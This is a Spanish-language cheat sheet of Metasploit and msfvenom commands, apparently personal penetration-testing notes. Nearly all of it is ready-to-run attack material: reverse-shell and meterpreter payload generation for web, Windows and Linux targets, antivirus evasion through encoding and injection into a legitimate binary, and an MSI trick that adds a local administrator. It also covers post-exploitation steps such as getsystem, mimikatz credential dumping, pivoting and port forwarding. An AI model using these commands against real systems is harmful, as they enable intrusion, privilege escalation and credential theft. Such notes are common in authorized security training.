Metasploit

Migrar proceso migrate PID

Ver procesos ps

Mostrar sesiones abiertas sessions -i

Volver a la sesion sessions -i NUM_SESSION

Windows local exploit suggester

El exploit sugester no funciona bien en sistemas x64.

post/multi/recon/local_exploit_suggester

msfvenom -p java/jsp_shell_reverse_tcp lhost=IP lport=PUERTO -f raw > shell.jsp

msfvenom -p windows/meterpreter/reverse_tcp lhost=IP lport=IP -f exe > shell.exe

meterpreter > execute -f "cmd.exe /c systeminfo > systeminfo.txt"

METASPLOIT

msfdb init Para iniciar la BBDD. msfconsole arrancar Metasploit use auxiliary/scanner/portscan/tcp Para usar un modulo back para volver atras show options para ver las opciones set RHOSTS 1.1.1.1 para setear una opcion

Un workspace es una BBDD donde se guardan los datos. workspace -a test para agregar un workspace workspace test para usar test como workspace workspace -d test para eliminar el workspace test

search type:auxiliary name:smb #buscar en modulos auxiliares que tengan smb en su nombre

sysinfo #Muestra la info del sistema getuid #Muestra el usuario que eres upload /usr/share_/windows-resources/binaries/nc.exe c:\Users\Victim donwload c:\Windows\system32\calc.exe /tmp/calc.exe execute -f notepad #Ejecuta un proceso en el sistema. ps #Muestra los procesos kill PID #Elimina un proceso

Genera un ejecutable con el meterpreter. msfvenom -p windows/shell_reverse_tcp LHOST=IP LPORT=IP -f exe -o shell_reverse.exe #Crea

Genera un ejecutable con el meterpreter y encodeado para evadir AV. msfvenom -p windows/shell_reverse_tcp LHOST=IP LPORT=IP -f exe -e x86/shikata_ga_nai -i 9 -o shell_reverse_encoded.exe

Genera un .msi, util si AlwaysInstallElevated esta habilitado. msfvenom -p windows/exec CMD='net localgroup administrators joe /add' -f msi > pkg.msi

Injecta el meterpreter en un ejecutable y lo encodea. msfvenom -p windows/shell_reverse_tcp LHOST=IP LPORT=IP -f exe -e x86/shikata_ga_nai -i 9 -x /usr/share/windows-resources/binaries/plink.exe -o shell_reverse_encoded_injected.exe

use multi/handler hay que especificar el payload que vamos a usar.

exploit -j lo deja en segundo plano jobs muestra los jobs jobs -i 0 vuelve al job

msfvenom -l formats muestra los formatos que admite para sacar un payload. background para volver a metasploit estando dentro de una sesion. sessions -l muestra las sessions. sessions -i ID para entrar en una session.

migrate PID para migrar el proceso load powershell para cargar el modulo de powershell help powershell para ver la informacion del modulo load kiwi para cargar mimikatz getsystem para obtener system creds_msv para dumpear los credenciales

route add 192.168.1.0/24 SESSION_ID route print para ver si se ha creado la ruta bien. use multi/manage/autoroute para agregar la ruta automaticamente.

use auxiliary/server/socks4a set srvhost 127.0.0.1 /etc/proxychains.conf socks4 127.0.0.1 1080 >> /etc/proxychains.conf

Crear un PortForward del 3389 local al 3389 remoto. portfwd add -l 3389 -p 3389 -r IP

Para automatizar metasploit. setup.rc use exploit/multi/handler set PAYLOAD set LHOST IP set LPORT IP set ExitOnSession false exploit -j -z msfconsole -r setup.rc

MSFVENOM

Php

msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.1.2 LPORT=443 -f raw > reverse.php
msfvenom -p php/reverse_php LHOST=192.168.1.2 LPORT=443 -f raw > reverse.php

War

msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.1.2 LPORT=443 -f war > reverse.war

Jar

msfvenom -p java/shell_reverse_tcp LHOST=192.168.1.2 LPORT=443 -f jar > reverse.jar

JSP

msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.1.2 LPORT=443 -f raw > reverse.jsp

Aspx

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.2 LPORT=443 -f aspx -o reverse.aspx

Windows Meterpreter (Metasploit Listener multi/handler) [Staged]

x86

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=443 -f exe > reverse.exe

x64

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=443 -f exe > reverse.exe

Shell (Metasploit Listener multi/handler) [Staged]

x86

msfvenom -p windows/shell/reverse_tcp LHOST=192.168.1.2 LPORT=443 -f exe > reverse.exe

x64

msfvenom -p windows/x64/shell/reverse_tcp LHOST=192.168.1.2 LPORT=443 -f exe > reverse.exe

Shell (Netcat Listener) [Stageless]

x86

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.2 LPORT=443 -f exe > reverse.exe

x64

msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.1.2 LPORT=443 -f exe > reverse.exe

Linux Meterpreter (Metasploit Listener multi/handler) [Staged]

x86

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=443 -f elf > reverse.elf

x64

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=443 -f elf > reverse.elf

Shell (Metasploit Listener multi/handler) [Staged]

x86

msfvenom -p linux/x86/shell/reverse_tcp LHOST=192.168.1.2 LPORT=443 -f elf > reverse.elf

x64

msfvenom -p linux/x64/shell/reverse_tcp LHOST=192.168.1.2 LPORT=443 -f elf > reverse.elf

Shell (Netcat Listener) [Stageless]

x86

msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.1.2 LPORT=443 -f elf > reverse.elf

x64

msfvenom -p linux/x64/shell_reverse_tcp LHOST=192.168.1.2 LPORT=443 -f elf > reverse.elf